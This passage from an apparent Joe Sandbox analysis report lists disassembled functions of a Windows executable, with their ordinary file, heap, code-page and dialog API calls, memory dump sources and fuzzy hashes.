                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: 3To
                                                            • API String ID: 1269201914-245939750
                                                            • Opcode ID: ec383a67574565957502a22829121625532fa0e3c2c5ffeed75a1ca2d572f394
                                                            • Instruction ID: 432328b0a4afe5b72a2772755b63c1a1aed0d0fe886c9adb9b85d1ea6d8a9eb9
                                                            • Opcode Fuzzy Hash: ec383a67574565957502a22829121625532fa0e3c2c5ffeed75a1ca2d572f394
                                                            • Instruction Fuzzy Hash: D1B0928639A0967C2108B2052E42C360118C090B95320802BB604C8281988008012432
                                                            Function 00CEBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CEB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CEBA44,?), ref: 00CEB7E6
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CEBA89,?,00000000), ref: 00CEBC64
                                                            • GetCPInfo.KERNEL32(00000000,00CEBA89,?,?,?,00CEBA89,?,00000000), ref: 00CEBC77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: afdb3ecfec0c31f8371759568c61ad1bf5b31b963ccce7e9138e3e51b1325a42
                                                            • Instruction ID: 71cd51073b1634bc6441341065e3b7e72daab67f9279062a53dc5ee5a4624e46
                                                            • Opcode Fuzzy Hash: afdb3ecfec0c31f8371759568c61ad1bf5b31b963ccce7e9138e3e51b1325a42
                                                            • Instruction Fuzzy Hash: A7515470A047D59EDB208F77C8816BBBBE5EF41300F28446ED4A68B262D7359F46DB90
                                                            Function 00CC9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00CC9A50,?,?,00000000,?,?,00CC8CBC,?), ref: 00CC9BAB
                                                            • GetLastError.KERNEL32(?,00000000,00CC8411,-00009570,00000000,000007F3), ref: 00CC9BB6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 12d676219fb2046c684498e276ce6d79fd9d8185fbad3d1d0190f71ce8b517ba
                                                            • Instruction ID: 69131f5ca6b02269df919dd46a9109f01b50819b166a60009209184bd9a576b0
                                                            • Opcode Fuzzy Hash: 12d676219fb2046c684498e276ce6d79fd9d8185fbad3d1d0190f71ce8b517ba
                                                            • Instruction Fuzzy Hash: 9F41DE71604341AFDB34DF15E5A8E6AB7E5FFD4320F158A2DE8A183260D770EE058A51
                                                            Function 00CEBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CE97E5: GetLastError.KERNEL32(?,00D01030,00CE4674,00D01030,?,?,00CE3F73,00000050,?,00D01030,00000200), ref: 00CE97E9
                                                              • Part of subcall function 00CE97E5: _free.LIBCMT ref: 00CE981C
                                                              • Part of subcall function 00CE97E5: SetLastError.KERNEL32(00000000,?,00D01030,00000200), ref: 00CE985D
                                                              • Part of subcall function 00CE97E5: _abort.LIBCMT ref: 00CE9863
                                                              • Part of subcall function 00CEBB4E: _abort.LIBCMT ref: 00CEBB80
                                                              • Part of subcall function 00CEBB4E: _free.LIBCMT ref: 00CEBBB4
                                                              • Part of subcall function 00CEB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CEBA44,?), ref: 00CEB7E6
                                                            • _free.LIBCMT ref: 00CEBA9F
                                                            • _free.LIBCMT ref: 00CEBAD5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID:
                                                            • API String ID: 2991157371-0
                                                            • Opcode ID: c59cbf1c9322bacdae0412e470c3ae4555fe7eeee0328ed43479d675cda7f7a0
                                                            • Instruction ID: 5a12a35f5d17fff7fa183d8c4747a45d32b951403726ea633d4499cc9f65f5aa
                                                            • Opcode Fuzzy Hash: c59cbf1c9322bacdae0412e470c3ae4555fe7eeee0328ed43479d675cda7f7a0
                                                            • Instruction Fuzzy Hash: B431AC31904189AFDF10DF6AE841BBEB7F5EF40324F2540A9E5149B2A1EB715E44FB50
                                                            Function 00CC1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC1E55
                                                              • Part of subcall function 00CC3BBA: __EH_prolog.LIBCMT ref: 00CC3BBF
                                                            • _wcslen.LIBCMT ref: 00CC1EFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: b8bd1ef192f65b27c665038ecf16e0cd796517442dd43ab327889e9434d8c155
                                                            • Instruction ID: 4bb41acaba3304de715f7f26ee629f88f492358e10789995a741638a42564687
                                                            • Opcode Fuzzy Hash: b8bd1ef192f65b27c665038ecf16e0cd796517442dd43ab327889e9434d8c155
                                                            • Instruction Fuzzy Hash: 4D314B71904249AFCF15EF9AC945EEEBBF6AF49300F1400AEF845A7252CB325E41DB60
                                                            Function 00CC9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CC73BC,?,?,?,00000000), ref: 00CC9DBC
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CC9E70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            • Opcode ID: 9165b9b2bf9439e9ef5514f1f2df98d82bfb099046475bc9bdc00577840a9ad0
                                                            • Instruction ID: e02f98ade095a0571b626c3091a79e40a4c4dfa9c7643e11cbed70e07640cad1
                                                            • Opcode Fuzzy Hash: 9165b9b2bf9439e9ef5514f1f2df98d82bfb099046475bc9bdc00577840a9ad0
                                                            • Instruction Fuzzy Hash: 1221CE31248285ABC714DF24C899FAABBE4EF55304F08491DF8E687151D339EA0DDB62
                                                            Function 00CC966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CC9F27,?,?,00CC771A), ref: 00CC96E6
                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CC9F27,?,?,00CC771A), ref: 00CC9716
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 9a59275a13d86289cda513c65476211c90e613133e9fc23afb99dd4a6d69c702
                                                            • Instruction ID: 8df1a19b186a8d0106ef92e29b54e20eb7bf4ec7ea910ae76e8c5b71eadffa96
                                                            • Opcode Fuzzy Hash: 9a59275a13d86289cda513c65476211c90e613133e9fc23afb99dd4a6d69c702
                                                            • Instruction Fuzzy Hash: 4F21BDB15003446FE3708A65CC89FB7B7DCEB49324F100A1DFAA5C62D1C774A9849631
                                                            Function 00CC9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00CC9EC7
                                                            • GetLastError.KERNEL32 ref: 00CC9ED4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: b7e36cf2b1515091ae52c04cc8de69b35601738a73303ecba7d25c4c459330bd
                                                            • Instruction ID: 2b3f81c6511420551fe6cfc9a0473ccbf0e1641021b997f2e09289bfabcdde78
                                                            • Opcode Fuzzy Hash: b7e36cf2b1515091ae52c04cc8de69b35601738a73303ecba7d25c4c459330bd
                                                            • Instruction Fuzzy Hash: 6811A571600700ABD724C669C849FA6B7E9EB55360F504A2DE563D26D0D7B0EE45C760
                                                            Function 00CE8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00CE8E75
                                                              • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00D01098,00CC17CE,?,?,00000007,?,?,?,00CC13D6,?,00000000), ref: 00CE8EB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocAllocate_free
                                                            • String ID:
                                                            • API String ID: 2447670028-0
                                                            • Opcode ID: 79c70cfafa544db70ea441021aed409da36e16570049ac987e0daa5763fcb100
                                                            • Instruction ID: b6f82b6f933a8d4937c7ca7e1e9cfa0b6afc874cfeeb31376959461a5052db0e
                                                            • Opcode Fuzzy Hash: 79c70cfafa544db70ea441021aed409da36e16570049ac987e0daa5763fcb100
                                                            • Instruction Fuzzy Hash: 32F0F63A2012C27ADB212A279C05F6F37588F82B70F680125F82CA7191DF74CE08A1A0
                                                            Function 00CD109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 00CD10AB
                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CD10B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: 44b8a650405cb64cf29652ba87347db5823d58941724e72f0d17a1e8b81a0583
                                                            • Instruction ID: 838c8e4d8be9534f84defd4e27eac4ad653253b08083e454225c31d6ec892772
                                                            • Opcode Fuzzy Hash: 44b8a650405cb64cf29652ba87347db5823d58941724e72f0d17a1e8b81a0583
                                                            • Instruction Fuzzy Hash: 03E09272B10185B78F0997A49C05ABF72DEEA442443184177EA13D3201F934EF418760
                                                            Function 00CCA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                              • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: b9606aa19b3353566a66d835d741e24236723531a0d62e6f85d4ce513b479649
                                                            • Instruction ID: 492569a820869221fd1788fa113b580d7e3274d5557f1df9cf91546c9ab7abc0
                                                            • Opcode Fuzzy Hash: b9606aa19b3353566a66d835d741e24236723531a0d62e6f85d4ce513b479649
                                                            • Instruction Fuzzy Hash: 84F0393624024DBBDF016F60DC45FEE3B6CAF04389F488066B949D6160DB71DE99EA61
                                                            Function 00CCA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641,000000FF), ref: 00CCA1F1
                                                              • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641), ref: 00CCA21F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2643169976-0
                                                            • Opcode ID: ca82dabb5c49bcb10570121dbfd1e379bca3d86e74735b0629c58b7746d09e27
                                                            • Instruction ID: cc83a65da11962d74a05e6f85a0778ccff7846d78407c5d839993e6fce246c71
                                                            • Opcode Fuzzy Hash: ca82dabb5c49bcb10570121dbfd1e379bca3d86e74735b0629c58b7746d09e27
                                                            • Instruction Fuzzy Hash: D8E0923114021D7BDB015F60DC45FEE375CAF08385F484026B948D6050EB61DE84EA55
                                                            Function 00CDAC7C Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00CF2641,000000FF), ref: 00CDACB0
                                                            • OleUninitialize.OLE32(?,?,?,?,00CF2641,000000FF), ref: 00CDACB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: GdiplusShutdownUninitialize
                                                            • String ID:
                                                            • API String ID: 3856339756-0
                                                            • Opcode ID: 759822b3dc50db449b2b4e9cc6f18a771afbdc57e533c07eb7899544b7e86183
                                                            • Instruction ID: 1658584647e0aba0b447ee0afdca330b7d0df24961190e4a3227804946fbbeb4
                                                            • Opcode Fuzzy Hash: 759822b3dc50db449b2b4e9cc6f18a771afbdc57e533c07eb7899544b7e86183
                                                            • Instruction Fuzzy Hash: 01E06D72604654EFCB11EB58DC06B59FBA9FB88B20F00426AF416D37A0CB74A801CAA5
                                                            Function 00CCA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00CCA23A,?,00CC755C,?,?,?,?), ref: 00CCA254
                                                              • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CCA23A,?,00CC755C,?,?,?,?), ref: 00CCA280
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: e3c77b335e96fd8d84cb9867d479ac8c5a146eff3c4ae2e44d276789372c5a97
                                                            • Instruction ID: 40d495f7e1efcde5a5d71407508eb26e5e8639cd84a9e4c07fee9ead39c30e79
                                                            • Opcode Fuzzy Hash: e3c77b335e96fd8d84cb9867d479ac8c5a146eff3c4ae2e44d276789372c5a97
                                                            • Instruction Fuzzy Hash: 32E092325001286BCB50AB64DC09FE97B58EB083E5F044262FE58E3294DB70DE44CAA1
                                                            Function 00CDDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00CDDEEC
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 00CDDF03
                                                              • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                              • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                              • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010456,?), ref: 00CDB59E
                                                              • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                              • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                            • String ID:
                                                            • API String ID: 2718869927-0
                                                            • Opcode ID: 75ff076d4fda7ee08261ccd4ab150db1a87fa054f2eb33194e97a293e97fefc7
                                                            • Instruction ID: 53121d0b300577812adef4f52182e9005048816b4c427017f1a61972ff3badf7
